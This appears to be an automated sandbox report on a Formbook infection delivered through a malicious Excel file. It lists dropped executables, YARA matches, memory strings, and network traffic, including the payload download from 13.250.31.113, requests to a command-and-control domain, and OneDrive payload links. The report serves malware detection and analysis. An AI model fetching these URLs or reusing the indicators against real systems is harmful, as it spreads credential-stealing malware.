              Source: EXCEL.EXE, 00000000.00000002.682326034.0000000005297000.00000002.00020000.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
              Source: explorer.exe, 00000006.00000000.533320819.0000000004650000.00000002.00020000.sdmpString found in binary or memory: http://treyresearch.net
              Source: explorer.exe, 00000006.00000000.533320819.0000000004650000.00000002.00020000.sdmpString found in binary or memory: http://wellformedweb.org/CommentAPI/
              Source: EXCEL.EXE, 00000000.00000002.682326034.0000000005297000.00000002.00020000.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
              Source: vbc.exe, 00000004.00000002.564186238.00000000041D0000.00000002.00020000.sdmpString found in binary or memory: http://www.%s.comPA
              Source: vbc.exe, 00000004.00000002.560666906.00000000006F4000.00000004.00000020.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
              Source: vbc.exe, 00000004.00000002.560666906.00000000006F4000.00000004.00000020.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
              Source: explorer.exe, 00000006.00000000.533320819.0000000004650000.00000002.00020000.sdmpString found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww
              Source: EXCEL.EXE, 00000000.00000002.682149975.00000000050B0000.00000002.00020000.sdmpString found in binary or memory: http://www.hotmail.com/oe
              Source: EXCEL.EXE, 00000000.00000002.682326034.0000000005297000.00000002.00020000.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
              Source: EXCEL.EXE, 00000000.00000002.682149975.00000000050B0000.00000002.00020000.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
              Source: explorer.exe, 00000006.00000000.524090665.00000000044E7000.00000004.00000001.sdmpString found in binary or memory: http://www.piriform.com/ccleaner
              Source: EXCEL.EXE, 00000000.00000002.682149975.00000000050B0000.00000002.00020000.sdmpString found in binary or memory: http://www.windows.com/pctv.
              Source: vbc.exe, 00000004.00000002.560538430.00000000006B1000.00000004.00000020.sdmpString found in binary or memory: https://onedrive.live.com/
              Source: vbc.exe, 00000004.00000002.562388389.0000000003440000.00000004.00000001.sdmpString found in binary or memory: https://onedrive.live.com/download?cid=019F6FABB02B7788&resid=19F6FABB02B7788%21112&authkey=AE1p912K
              Source: vbc.exe, 00000004.00000002.560538430.00000000006B1000.00000004.00000020.sdmpString found in binary or memory: https://onedrive.live.com/h
              Source: vbc.exe, 00000004.00000002.560666906.00000000006F4000.00000004.00000020.sdmp, vbc.exe, 00000004.00000002.560538430.00000000006B1000.00000004.00000020.sdmpString found in binary or memory: https://prigmg.am.files.1drv.com/
              Source: vbc.exe, 00000004.00000002.560816564.0000000000742000.00000004.00000020.sdmp, vbc.exe, 00000004.00000002.560666906.00000000006F4000.00000004.00000020.sdmpString found in binary or memory: https://prigmg.am.files.1drv.com/y4mfRNWO7SrNuAYoryEOMK_9RlPbjHtMV-Ced5E-MYQaa4drd6L19k6a-_ziTYMgTYz
              Source: vbc.exe, 00000004.00000002.560816564.0000000000742000.00000004.00000020.sdmpString found in binary or memory: https://prigmg.am.files.1drv.com/y4mqjjzWO8S-4gOMPNZjROyLuecmLMO_yUlIbF8EkCZOGaN9ucABdXCb_4exrao8vW7
              Source: vbc.exe, 00000004.00000002.560816564.0000000000742000.00000004.00000020.sdmp, vbc.exe, 00000004.00000002.560666906.00000000006F4000.00000004.00000020.sdmpString found in binary or memory: https://prigmg.am.files.1drv.com/y4mwh1Q_kqHdVkzavMrAxJ1wAVvTumvDrRTyon4A-0Nej1qBpoUH6im7VZQh8GfsFzJ
              Source: vbc.exe, 00000004.00000002.560666906.00000000006F4000.00000004.00000020.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A766E4F6.emfJump to behavior
              Source: unknownDNS traffic detected: queries for: onedrive.live.com
              Source: global trafficHTTP traffic detected: GET /7009/binso.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 13.250.31.113Connection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /hno0/?mhcd=MR-LdRqXxT7p86&g6A06=gtNg4Bp0cFA4pVLeRD7vodntk6HewgsZ+AnpdRhteKnDm7bsVUj6fD8/RHuCSiZlcACYig== HTTP/1.1Host: www.urzeczenie.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 02 Dec 2021 18:35:28 GMTServer: Apache/2Content-Length: 392Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 68 6e 6f 30 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 75 72 7a 65 63 7a 65 6e 69 65 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /hno0/ was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2 Server at www.urzeczenie.com Port 80</address></body></html>
              Source: unknownTCP traffic detected without corresponding DNS query: 13.250.31.113
              Source: unknownTCP traffic detected without corresponding DNS query: 13.250.31.113
              Source: unknownTCP traffic detected without corresponding DNS query: 13.250.31.113
              Source: unknownTCP traffic detected without corresponding DNS query: 13.250.31.113
              Source: unknownTCP traffic detected without corresponding DNS query: 13.250.31.113
              Source: unknownTCP traffic detected without corresponding DNS query: 13.250.31.113
              Source: unknownTCP traffic detected without corresponding DNS query: 13.250.31.113
              Source: unknownTCP traffic detected without corresponding DNS query: 13.250.31.113
              Source: unknownTCP traffic detected without corresponding DNS query: 13.250.31.113
              Source: unknownTCP traffic detected without corresponding DNS query: 13.250.31.113
              Source: unknownTCP traffic detected without corresponding DNS query: 13.250.31.113
              Source: unknownTCP traffic detected without corresponding DNS query: 13.250.31.113
              Source: unknownTCP traffic detected without corresponding DNS query: 13.250.31.113
              Source: unknownTCP traffic detected without corresponding DNS query: 13.250.31.113
              Source: unknownTCP traffic detected without corresponding DNS query: 13.250.31.113
              Source: unknownTCP traffic detected without corresponding DNS query: 13.250.31.113
              Source: unknownTCP traffic detected without corresponding DNS query: 13.250.31.113
              Source: unknownTCP traffic detected without corresponding DNS query: 13.250.31.113
              Source: unknownTCP traffic detected without corresponding DNS query: 13.250.31.113
              Source: unknownTCP traffic detected without corresponding DNS query: 13.250.31.113
              Source: unknownTCP traffic detected without corresponding DNS query: 13.250.31.113
              Source: unknownTCP traffic detected without corresponding DNS query: 13.250.31.113
              Source: unknownTCP traffic detected without corresponding DNS query: 13.250.31.113
              Source: unknownTCP traffic detected without corresponding DNS query: 13.250.31.113
              Source: unknownTCP traffic detected without corresponding DNS query: 13.250.31.113
              Source: unknownTCP traffic detected without corresponding DNS query: 13.250.31.113
              Source: unknownTCP traffic detected without corresponding DNS query: 13.250.31.113
              Source: unknownTCP traffic detected without corresponding DNS query: 13.250.31.113
              Source: unknownTCP traffic detected without corresponding DNS query: 13.250.31.113
              Source: unknownTCP traffic detected without corresponding DNS query: 13.250.31.113
              Source: unknownTCP traffic detected without corresponding DNS query: 13.250.31.113
              Source: unknownTCP traffic detected without corresponding DNS query: 13.250.31.113
              Source: unknownTCP traffic detected without corresponding DNS query: 13.250.31.113
              Source: unknownTCP traffic detected without corresponding DNS query: 13.250.31.113
              Source: unknownTCP traffic detected without corresponding DNS query: 13.250.31.113
              Source: unknownTCP traffic detected without corresponding DNS query: 13.250.31.113
              Source: unknownTCP traffic detected without corresponding DNS query: 13.250.31.113
              Source: unknownTCP traffic detected without corresponding DNS query: 13.250.31.113
              Source: unknownTCP traffic detected without corresponding DNS query: 13.250.31.113
              Source: unknownTCP traffic detected without corresponding DNS query: 13.250.31.113
              Source: unknownTCP traffic detected without corresponding DNS query: 13.250.31.113
              Source: unknownTCP traffic detected without corresponding DNS query: 13.250.31.113
              Source: unknownTCP traffic detected without corresponding DNS query: 13.250.31.113
              Source: unknownTCP traffic detected without corresponding DNS query: 13.250.31.113
              Source: unknownTCP traffic detected without corresponding DNS query: 13.250.31.113
              Source: unknownTCP traffic detected without corresponding DNS query: 13.250.31.113
              Source: unknownTCP traffic detected without corresponding DNS query: 13.250.31.113
              Source: unknownTCP traffic detected without corresponding DNS query: 13.250.31.113
              Source: unknownTCP traffic detected without corresponding DNS query: 13.250.31.113
              Source: unknownTCP traffic detected without corresponding DNS query: 13.250.31.113
              Source: vbc.exe, 00000004.00000002.560538430.00000000006B1000.00000004.00000020.sdmpString found in binary or memory: /moc.nideknil.wwwwww.linkedin.com equals www.linkedin.com (Linkedin)
              Source: EXCEL.EXE, 00000000.00000002.682149975.00000000050B0000.00000002.00020000.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
              Source: vbc.exe, 00000004.00000002.560538430.00000000006B1000.00000004.00000020.sdmpString found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)
              Source: vbc.exe, 00000004.00000002.560666906.00000000006F4000.00000004.00000020.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
              Source: C:\Users\Public\vbc.exeCode function: 4_2_00433B64 GetKeyboardState,
              Source: C:\Users\Public\vbc.exeCode function: 4_2_00425A40 GetObjectA,GetDC,CreateCompatibleDC,CreateBitmap,CreateCompatibleBitmap,GetDeviceCaps,GetDeviceCaps,SelectObject,GetDIBColorTable,GetDIBits,SelectObject,CreateDIBSection,GetDIBits,SelectObject,SelectPalette,RealizePalette,FillRect,SetTextColor,SetBkColor,SetDIBColorTable,PatBlt,CreateCompatibleDC,SelectObject,SelectPalette,RealizePalette,SetTextColor,SetBkColor,BitBlt,SelectPalette,SelectObject,DeleteDC,SelectPalette,

              E-Banking Fraud:

              barindex
              Yara detected FormBookShow sources
              Source: Yara matchFile source: 00000006.00000000.535838106.0000000009304000.00000040.00020000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.563280324.0000000003A70000.00000040.00020000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000002.676416524.0000000000080000.00000040.00020000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000002.676695619.00000000001B0000.00000040.00020000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000002.676983429.00000000001F0000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.566151978.00000000047EC000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.561814301.0000000002111000.00000020.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.563603839.0000000003CC0000.00000040.00020000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.566701334.00000000049C0000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000000.548231693.0000000009304000.00000040.00020000.sdmp, type: MEMORY

              System Summary:

              barindex
              Malicious sample detected (through community Yara rule)Show sources
              Source: 00000006.00000000.535838106.0000000009304000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 00000006.00000000.535838106.0000000009304000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
              Source: 00000004.00000002.563280324.0000000003A70000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 00000004.00000002.563280324.0000000003A70000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
              Source: 0000000C.00000002.676416524.0000000000080000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 0000000C.00000002.676416524.0000000000080000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
              Source: 0000000C.00000002.676695619.00000000001B0000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 0000000C.00000002.676695619.00000000001B0000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
              Source: 0000000C.00000002.676983429.00000000001F0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 0000000C.00000002.676983429.00000000001F0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
              Source: 00000004.00000002.566151978.00000000047EC000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 00000004.00000002.566151978.00000000047EC000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
              Source: 00000004.00000002.561814301.0000000002111000.00000020.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 00000004.00000002.561814301.0000000002111000.00000020.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
              Source: 00000004.00000002.563603839.0000000003CC0000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 00000004.00000002.563603839.0000000003CC0000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
              Source: 00000004.00000002.566701334.00000000049C0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 00000004.00000002.566701334.00000000049C0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
              Source: 00000006.00000000.548231693.0000000009304000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 00000006.00000000.548231693.0000000009304000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
              Office equation editor drops PE fileShow sources
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\binso[1].exeJump to dropped file
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXECode function: 0_2_02E966E8
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXECode function: 0_2_02E966F3
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXECode function: 0_2_02E96340
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXECode function: 0_2_02E96743
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXECode function: 0_2_02E96753
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXECode function: 0_2_02E9CF01
              Source: C:\Users\Public\vbc.exeCode function: 4_2_0044629C
              Source: C:\Users\Public\vbc.exeCode function: 4_2_0044B47C
              Source: C:\Users\user\Odhbljup.exeCode function: 7_2_0044629C
              Source: C:\Users\user\Odhbljup.exeCode function: 7_2_0044B47C
              Source: C:\Users\user\Odhbljup.exeCode function: 10_2_0044629C
              Source: C:\Users\user\Odhbljup.exeCode function: 10_2_0044B47C
              Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_02071238
              Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_01FCE0C6
              Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_0201A37B
              Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_01FE905A
              Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_020763BF
              Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_01FD3040
              Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_01FFD005
              Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_01FF63DB
              Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_01FCF3CF
              Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_0204D06D
              Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_01FD7353
              Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_01FD2305
              Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_01FCE2E9
              Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_0205D13F
              Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_01FEC5F0
              Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_02072622
              Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_0201A634
              Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_01FD351F
              Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_01FE1489
              Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_0205579A
              Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_020057C3
              Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_0205443E
              Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_01FDC7BC
              Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_0200D47D
              Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_02005485
              Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_01FDE6C1
              Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_02016540
              Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_01FD4680
              Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_020505E3
              Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_01FE69FE
              Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_01FD29B2
              Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_02083A83
              Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_01FF286D
              Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_01FDC85C
              Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_0207CBA4
              Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_02056BCB
              Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_0205DBDA
              Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_01FCFBD7
              Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_0204F8C4
              Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_0206F8EE
              Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_01FF7B00
              Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_0205394B
              Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_02055955
              Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_0207098E
              Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_02002E2F
              Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_01FDCD5B
              Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_0205BF14
              Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_0206CFB1
              Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_02042FDC
              Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_0205AC5E
              Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_01FFDF7C
              Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_01FE0F3F
              Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_02000D3B
              Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_01FEEE4C
              Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_0206FDDD
              Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_0009D192
              Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_0009B8C6
              Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_0009C953
              Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_00088C7B
              Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_00088C80
              Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_0009BCA9
              Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_00082D87
              Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_00082D90
              Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_0009BDFF
              Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_00082FB0
              Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_00396F06
              Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_003932FF
              Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_00393302
              Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_00391362
              Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_00391359
              Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_003957B2
              Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_003908FB
              Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_00390902
              Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_00397D02
              Source: binso[1].exe.2.drStatic PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
              Source: vbc.exe.2.drStatic PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
              Source: Odhbljup.exe.4.drStatic PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
              Source: C:\Users\Public\vbc.exeSection loaded: amsi.dll
              Source: C:\Users\Public\vbc.exeSection loaded: amsi.dll
              Source: C:\Users\Public\vbc.exeSection loaded: amsi.dll
              Source: C:\Users\Public\vbc.exeSection loaded: amsi.dll
              Source: C:\Users\Public\vbc.exeSection loaded: amsi.dll
              Source: C:\Users\Public\vbc.exeSection loaded: amsi.dll
              Source: C:\Users\Public\vbc.exeSection loaded: ieproxy.dll
              Source: C:\Users\Public\vbc.exeSection loaded: ieproxy.dll
              Source: C:\Users\Public\vbc.exeSection loaded: ieproxy.dll
              Source: C:\Users\user\Odhbljup.exeSection loaded: amsi.dll
              Source: C:\Users\user\Odhbljup.exeSection loaded: amsi.dll
              Source: C:\Users\user\Odhbljup.exeSection loaded: amsi.dll
              Source: C:\Users\user\Odhbljup.exeSection loaded: amsi.dll
              Source: C:\Users\user\Odhbljup.exeSection loaded: amsi.dll
              Source: C:\Users\user\Odhbljup.exeSection loaded: amsi.dll
              Source: C:\Users\user\Odhbljup.exeSection loaded: ieproxy.dll
              Source: C:\Users\user\Odhbljup.exeSection loaded: ieproxy.dll
              Source: C:\Users\user\Odhbljup.exeSection loaded: ieproxy.dll
              Source: C:\Users\user\Odhbljup.exeSection loaded: amsi.dll
              Source: C:\Users\user\Odhbljup.exeSection loaded: amsi.dll
              Source: C:\Users\user\Odhbljup.exeSection loaded: amsi.dll
              Source: C:\Users\user\Odhbljup.exeSection loaded: amsi.dll
              Source: C:\Users\user\Odhbljup.exeSection loaded: amsi.dll
              Source: C:\Users\user\Odhbljup.exeSection loaded: amsi.dll
              Source: C:\Users\user\Odhbljup.exeSection loaded: ieproxy.dll
              Source: C:\Users\user\Odhbljup.exeSection loaded: ieproxy.dll
              Source: C:\Users\user\Odhbljup.exeSection loaded: ieproxy.dll
              Source: C:\Users\Public\vbc.exeMemory allocated: 76F90000 page execute and read and write
              Source: C:\Users\Public\vbc.exeMemory allocated: 76E90000 page execute and read and write
              Source: C:\Users\user\Odhbljup.exeMemory allocated: 76F90000 page execute and read and write
              Source: C:\Users\user\Odhbljup.exeMemory allocated: 76E90000 page execute and read and write
              Source: C:\Users\user\Odhbljup.exeMemory allocated: 76F90000 page execute and read and write
              Source: C:\Users\user\Odhbljup.exeMemory allocated: 76E90000 page execute and read and write
              Source: C:\Windows\SysWOW64\NAPSTAT.EXEMemory allocated: 76F90000 page execute and read and write
              Source: C:\Windows\SysWOW64\NAPSTAT.EXEMemory allocated: 76E90000 page execute and read and write
              Source: 00000007.00000003.560841692.00000000046D4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
              Source: 0000000A.00000003.583392738.00000000038CC000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
              Source: 00000004.00000003.497269548.00000000045D4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
              Source: 0000000A.00000003.584292302.00000000045A4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
              Source: 00000007.00000003.562335520.00000000046D4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
              Source: 00000007.00000003.561342324.00000000039EC000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
              Source: 00000007.00000003.560628845.00000000039EC000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
              Source: 00000006.00000000.535838106.0000000009304000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
